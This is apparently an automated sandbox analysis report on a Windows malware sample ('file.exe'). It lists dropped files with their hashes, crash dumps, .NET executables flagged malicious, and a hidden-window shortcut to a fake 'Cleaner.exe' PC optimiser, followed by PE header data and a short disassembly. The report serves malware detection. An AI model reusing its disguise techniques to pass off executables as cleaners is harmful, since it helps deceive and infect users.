                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.45654686969491
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsoJgtWI9cSWgc8sqYj48fm8M4JbIMF/d+q8vcICr8MjTzd:uITfu/zgrsqYJJM4KxCr8MXzd
                                                      MD5:EE5D573C520D7E74E7BDC66313779C2A
                                                      SHA1:FE359D5641AAFB1F185719E4B4F0E3109C7EDE88
                                                      SHA-256:882C002B2BF4B30B0D1566FCDB85E7BB49F37CA1A790AD8AB4006FA0A702F26E
                                                      SHA-512:EB27951B0ADF6F216BCB606E5FE43C0EECD909DA3EC580EA10C65EA1BCC58F3DC156C62BCA9BFDA7A16A41B1604B27B9A5E83A71CD4B2E3068E9AB615E8D61B5
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719941" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:50 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):85922
                                                      Entropy (8bit):2.042682057237551
                                                      Encrypted:false
                                                      SSDEEP:384:1sP67P0bSdGWxubKYXcPOH5T4LNpOjHY0zdSqmK+d:1b7PGFW0b/MZpOUBqmKU
                                                      MD5:323B1369AE060404F099D7A548F8BCF7
                                                      SHA1:205016ACE3D79583228472271163791553165AA0
                                                      SHA-256:BD660BC723F51C81DC2001E46D443915B39ECF45CCD7969115C8481A9FD60C15
                                                      SHA-512:3F0F47C26F736CD5A113A1F778222DF468C94F075EC62E054EB6913E4F1DD9B75168158B6BB635C4C8604905E9192E12EB00848F204EBF46BC38A31BF5A3108A
                                                      Malicious:false
                                                      Preview:MDMP....... .......~~;c........................x...............H<..........T.......8...........T...........P$..R+..........4........... ....................................................................U...........B..............GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8394
                                                      Entropy (8bit):3.694487454395994
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CF6I7WQ6YBS3SUAgmf6TS4CpBO89brysfwZm:RrlsNiw6I7h6YBySUAgmf+SFrxfT
                                                      MD5:A9D3BEB83A3A49BAFC7FAD69FECE0815
                                                      SHA1:0E63BE8A5C09237C7361856D42A9A3E2A2E63D6F
                                                      SHA-256:7D8899D27833F79CDF96CB830B567CC199B50266A0091DCDBFA76F64CBD76BB9
                                                      SHA-512:192F9A0E4BB3B2A5B84EE44C34C06EBB27B540B24CB10DB640996BCFD65911D9AFC231FBB01846B55FE0E4618576459BB4206B5F9505FF4F5CD26B9126B819FC
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.458664894658237
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjV8fm8M4JblMFB+q8vclCr8MjTzd:uITfh/zgrsqYeJpYKoCr8MXzd
                                                      MD5:23444136DE422A5136DC8B6B34A7CA3F
                                                      SHA1:B61755F4AA63F2A6A99BF73277282F783BE293D8
                                                      SHA-256:00BCEE5104EE16CB5B214D848E44783A479730826CC38BE6804C9E82CDF60C76
                                                      SHA-512:18382FA0FDA0EFA448AC1CE5651F5A14FC0531D134E77A6DA087CF79B81DA55D73E135BE96D9252545CCA0C51E9713DA8C6A05DC5C92F101926B34B544DAB270
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:53 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):94676
                                                      Entropy (8bit):2.03619832732963
                                                      Encrypted:false
                                                      SSDEEP:384:BPwyPhVnUbsJ9PuiYXcPObDUT4LNpOjHYIzADGBqEX7LtMRYB4bkyP:+yPzxJ9PuxUMZpOUAMP
                                                      MD5:C7A947FFB5664EB838577C8A5AFB8A2E
                                                      SHA1:58011E9C9BCC42A5C84FCFF6F7E8469CBDF82115
                                                      SHA-256:07A75195B2B86B1A927250E1E7932C2948AA1D95204797B2A46B9645ABD28E3D
                                                      SHA-512:40E8BB0AFD2BBDC4A7B75EA547158878DA02B903D57CA4BF136F8428488142E3D003CA91EC5FEFA39E7ACB83188328DC604A01C358DFA06330B3313FE0D42615
                                                      Malicious:false
                                                      Preview:MDMP....... ........~;c........................x...............D?..........T.......8...........T...........x$..\M..........d...........P....................................................................U...........B..............GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8394
                                                      Entropy (8bit):3.6958151770219105
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CK6Izp+6YBShSUpbkSgmf6TS4CpBk89bwysffkwm:RrlsNiP6IzQ6YB0SUDgmf+SDwxfa
                                                      MD5:BAEA939A33C066CDAC533ED4BB07685C
                                                      SHA1:78509AEC3E43E7801442F28BD094E68511B87096
                                                      SHA-256:1A072632181920CF9C70CAD46F74D4274A83199997C53A2D2FF2328B15B6A902
                                                      SHA-512:A21F4AF0E3DDD5B3AA72800A0836F21BA4751E80DB7CE9BD3835868BA0407ECC12A2266B2C53942F250A35AB9CC41261DA4CBB3C0B53975E7C868CEC22F9342E
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.458457061278479
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYj+8fm8M4JblMFF+q8vclCr8MjTzd:uITfh/zgrsqY3JpwKoCr8MXzd
                                                      MD5:7FFD213E5875EB41AEF4C2FBBFB57C5C
                                                      SHA1:F91A9D0A82A0E6BE6F8E77E4D90EAC8951254CDB
                                                      SHA-256:D1B81B11648E0F6833FF746275B2D9252B31FC5F8226CCA7C45B834EA84668F0
                                                      SHA-512:9D091BCC0E8132C9FDF24897078166326082F66E4EE59D6EE6183DD161E679BB6700726CD0E22A165EC2C10B1EAC3A1FC8BF04E8D9E0A13DC3C28872B711598B
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:55 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):103386
                                                      Entropy (8bit):2.0851608891850866
                                                      Encrypted:false
                                                      SSDEEP:384:EpwjGizPDGYjUdeztRtFZYXmPOFncZarT4LNpOjHwveXzoYZfvr0ZWP:kHiPy+UdeztRtFUlMZpOM2fD0
                                                      MD5:ED9A797712F185529B05E65284A4C5A2
                                                      SHA1:926267A934EEF1FC491C41EA8C9D7F2925D62D66
                                                      SHA-256:D8AA8B659BC463CBA9F2057660ADC8D6BD5A2DC769E8BE86444C516CAB0C5367
                                                      SHA-512:B436071DE0F12B0CBED80F845269ACCF4449A4C1D4F2A20906A58BC7FEF0846C44B3BE374E5F9DB46D2DF6DFDB1D9BE8691C37B87112C853ACC4CFDC4E8EA7E1
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8394
                                                      Entropy (8bit):3.6955265060547693
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CR6Iaxt6YBStSUHpgmf6TS4CpBY89bdysfw/m:RrlsNiE6Iaxt6YB4SUJgmf+SHdxfV
                                                      MD5:D60843507CAB3A23073630B0FBDA8E1C
                                                      SHA1:1B4FA2E29515EC4C697F5EB75132DE2C7AE3D58B
                                                      SHA-256:C691854134DA01AB60B97E96E02DC9DCB6464F13A163808CC0B8B1C711D03EFF
                                                      SHA-512:2105DBFFFA3D30D8124E01F27DFBF86320DD81CCC3AC77202FD59C2FCD253413425E1AD79909E9CE807163FBE52F66053DAA0C08C64066E9B7C90E10BF9D4E53
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.459801496716276
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjh8fm8M4JblMFO+q8vclCr8MjTzd:uITfh/zgrsqYaJp/KoCr8MXzd
                                                      MD5:63751B32A60BE5D04952043392BE8999
                                                      SHA1:6C5A2FA9D95FE64D22225C8666D3F027E3101561
                                                      SHA-256:93A1C016CDBCB4A635D68282899146ABFC38D41CABDD688E51300A734BBDF719
                                                      SHA-512:F48960461ED86D01B81AD6D52A3F9A144579558419162C0E5A0979B37731865114391235840FFE7D2FB37928FBC30BBD69D37B4B0A8EA49B1E06B5545FBB418E
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:V:V
                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                      Malicious:false
                                                      Preview:0
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3947920
                                                      Entropy (8bit):7.275018147968825
                                                      Encrypted:false
                                                      SSDEEP:49152:+/PD/DL/D9CuZrr2h60qPPB+lJJkF9IC966eB+lJJkF9IC966eB+lJJkF9IC966h:+3D///UUrP43m8C/3m8C/3m8C5
                                                      MD5:04514BD4962F7D60679434E0EBE49184
                                                      SHA1:1493A5447EB8156A7D7AECFF60EE8BFBA2209526
                                                      SHA-256:C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
                                                      SHA-512:A71C7ED5DFDDA22F095DC99B16E8342A42E3361BE16E0241DBF8983DD0D5F6E90EB0299AAC1815CF78AD3A9F15FA89B42B720B7F818EE5F502300F102EF4C93E
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):94224
                                                      Entropy (8bit):7.998072640845361
                                                      Encrypted:true
                                                      SSDEEP:1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
                                                      MD5:418619EA97671304AF80EC60F5A50B62
                                                      SHA1:F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
                                                      SHA-256:EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
                                                      SHA-512:F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:V:V
                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                      Malicious:false
                                                      Preview:0
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):17
                                                      Entropy (8bit):3.1751231351134614
                                                      Encrypted:false
                                                      SSDEEP:3:nCmxEl:Cmc
                                                      MD5:064DB2A4C3D31A4DC6AA2538F3FE7377
                                                      SHA1:8F877AE1873C88076D854425221E352CA4178DFA
                                                      SHA-256:0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
                                                      SHA-512:CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
                                                      Malicious:false
                                                      Preview:UwUoooIIrwgh24uuU
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):242176
                                                      Entropy (8bit):6.47050397947197
                                                      Encrypted:false
                                                      SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                      MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                      SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                      SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                      SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                       • Antivirus: Metadefender, Detection: 0%
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:V:V
                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                      Malicious:false
                                                      Preview:0
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:V:V
                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                      Malicious:false
                                                      Preview:0
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):242176
                                                      Entropy (8bit):6.47050397947197
                                                      Encrypted:false
                                                      SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                      MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                      SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                      SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                      SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                       • Antivirus: Metadefender, Detection: 0%
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3947920
                                                      Entropy (8bit):7.275018147968825
                                                      Encrypted:false
                                                      SSDEEP:49152:+/PD/DL/D9CuZrr2h60qPPB+lJJkF9IC966eB+lJJkF9IC966eB+lJJkF9IC966h:+3D///UUrP43m8C/3m8C/3m8C5
                                                      MD5:04514BD4962F7D60679434E0EBE49184
                                                      SHA1:1493A5447EB8156A7D7AECFF60EE8BFBA2209526
                                                      SHA-256:C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
                                                      SHA-512:A71C7ED5DFDDA22F095DC99B16E8342A42E3361BE16E0241DBF8983DD0D5F6E90EB0299AAC1815CF78AD3A9F15FA89B42B720B7F818EE5F502300F102EF4C93E
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Mon Oct 3 23:30:18 2022, mtime=Mon Oct 3 23:30:18 2022, atime=Mon Oct 3 23:30:18 2022, length=3947920, window=hide
                                                      Category:dropped
                                                      Size (bytes):2214
                                                      Entropy (8bit):3.9313193863453852
                                                      Encrypted:false
                                                      SSDEEP:48:81utFiwiLRwztCGqObJilZGqOnqV1oB6:8mMFFSvbhK1o
                                                      MD5:C33A2A09C2B58C5F99B46ACF927B39C9
                                                      SHA1:E3416DF6B82B0D497B66FD70632C100EFD909DA2
                                                      SHA-256:85E6634779D4685011A7D1B2988DCE28267C4C314D4D0F0D5F9CB431D36AD857
                                                      SHA-512:B12A716DB41AF508A5A05DBAF27774571E9F8AC2D30F1316BD3F472B9B39A7972E106ED7EA6B469428EFE4DEEDBDCDD5AF459CD33429CA7B95473F1956CE071A
                                                      Malicious:false
                                                      Preview:L..................F.@.. ...sZ.z.......z.......z.....=<.....................@.:..DG..Yr?.D..U..k0.&...&...........-..F`......Dq|........t...CFSF..1......NM...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......NM.DU.......Y.....................R..A.p.p.D.a.t.a...B.P.1......U....Local.<.......NM.DU.......Y.....................z..L.o.c.a.l.....N.1.....DU....Temp..:.......NM.DU.......Y.......................T.e.m.p.......1.....DU....6CLVSX~1..j......DU..DU...............................6.c.l.v.S.x.8.e.n.7.1.S.U.l.1.h.U.u.z.Q.6.n.5.6.l.W.M.0.....b.2..=<.DU.. .Cleaner.exe.H......DU..DU..............................(.C.l.e.a.n.e.r...e.x.e.......z...............-.......y..............U.....C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe....O.p.t.i.m.i.z.e. .y.o.u.r. .P.C.>.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.6.c.l.v.S.x.8.e.n.7.1.S.U.l.1.h.U.u.z.Q.6.n.5.6.l.W.M.0.\.C.l.e.a.n.e.r...e.x.e.K.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.462227283357498
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:file.exe
                                                      File size:238080
                                                      MD5:526fde9e61b1b4835885973331fa1616
                                                      SHA1:ebbb0c3586b8a0244585eacb44ca125ac933ad8e
                                                      SHA256:093741e4079a8092ba9d94653cb4f11c15fbe1e9ef53690e91628c61f0cc9440
                                                      SHA512:ceff6066cd30ead43c4afcdc1b227ae114d4174fb75ff68c1495cbc6ef7bcb158bf2535669bd9add353e72ed3b97df48a9ad4cf21941db9d702d6f786bbae318
                                                      SSDEEP:6144:oKFyXCCNTdMc9uzUCEJ/z1qWYHR+qvkqs3PZ5E:NFoC+ZUzl+RWR+1qs/s
                                                      TLSH:7B34F1123CD18932C93E74718C71CA5277BFB8816672D94A76FC1AAE5F626C06E30397
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}...............N1......N'.................D....N ......N0......N5.....Rich............PE..L.....Mb...........................
                                                      Icon Hash:3370686068686869
                                                      Entrypoint:0x404be7
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x624D8102 [Wed Apr 6 12:01:06 2022 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:0
                                                      File Version Major:5
                                                      File Version Minor:0
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:0
                                                      Import Hash:c9c09dee9cb4e9617f155f42be2e2cc0
                                                      Instruction
                                                      call 00007F16B8E0F99Bh
                                                      jmp 00007F16B8E0C52Dh
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      mov ecx, dword ptr [esp+04h]
                                                      test ecx, 00000003h
                                                      je 00007F16B8E0C6D6h
                                                      mov al, byte ptr [ecx]
                                                      add ecx, 01h
                                                      test al, al
                                                      je 00007F16B8E0C700h
                                                      test ecx, 00000003h
                                                      jne 00007F16B8E0C6A1h
                                                      add eax, 00000000h
                                                      lea esp, dword ptr [esp+00000000h]
                                                      lea esp, dword ptr [esp+00000000h]
                                                      mov eax, dword ptr [ecx]
                                                      mov edx, 7EFEFEFFh
                                                      add edx, eax
                                                      xor eax, FFFFFFFFh
                                                      xor eax, edx
                                                      add ecx, 04h
                                                      test eax, 81010100h
                                                      je 00007F16B8E0C69Ah
                                                      mov eax, dword ptr [ecx-04h]
                                                      test al, al
                                                      je 00007F16B8E0C6E4h
                                                      test ah, ah
                                                      je 00007F16B8E0C6D6h
                                                      test eax, 00FF0000h
                                                      je 00007F16B8E0C6C5h
                                                      test eax, FF000000h
                                                      je 00007F16B8E0C6B4h
                                                      jmp 00007F16B8E0C67Fh
                                                      lea eax, dword ptr [ecx-01h]
                                                      mov ecx, dword ptr [esp+04h]
                                                      sub eax, ecx
                                                      ret
                                                      lea eax, dword ptr [ecx-02h]
                                                      mov ecx, dword ptr [esp+04h]
                                                      sub eax, ecx
                                                      ret
                                                      lea eax, dword ptr [ecx-03h]
                                                      mov ecx, dword ptr [esp+04h]
                                                      sub eax, ecx
                                                      ret
                                                      lea eax, dword ptr [ecx-04h]
                                                      mov ecx, dword ptr [esp+04h]
                                                      sub eax, ecx
                                                      ret
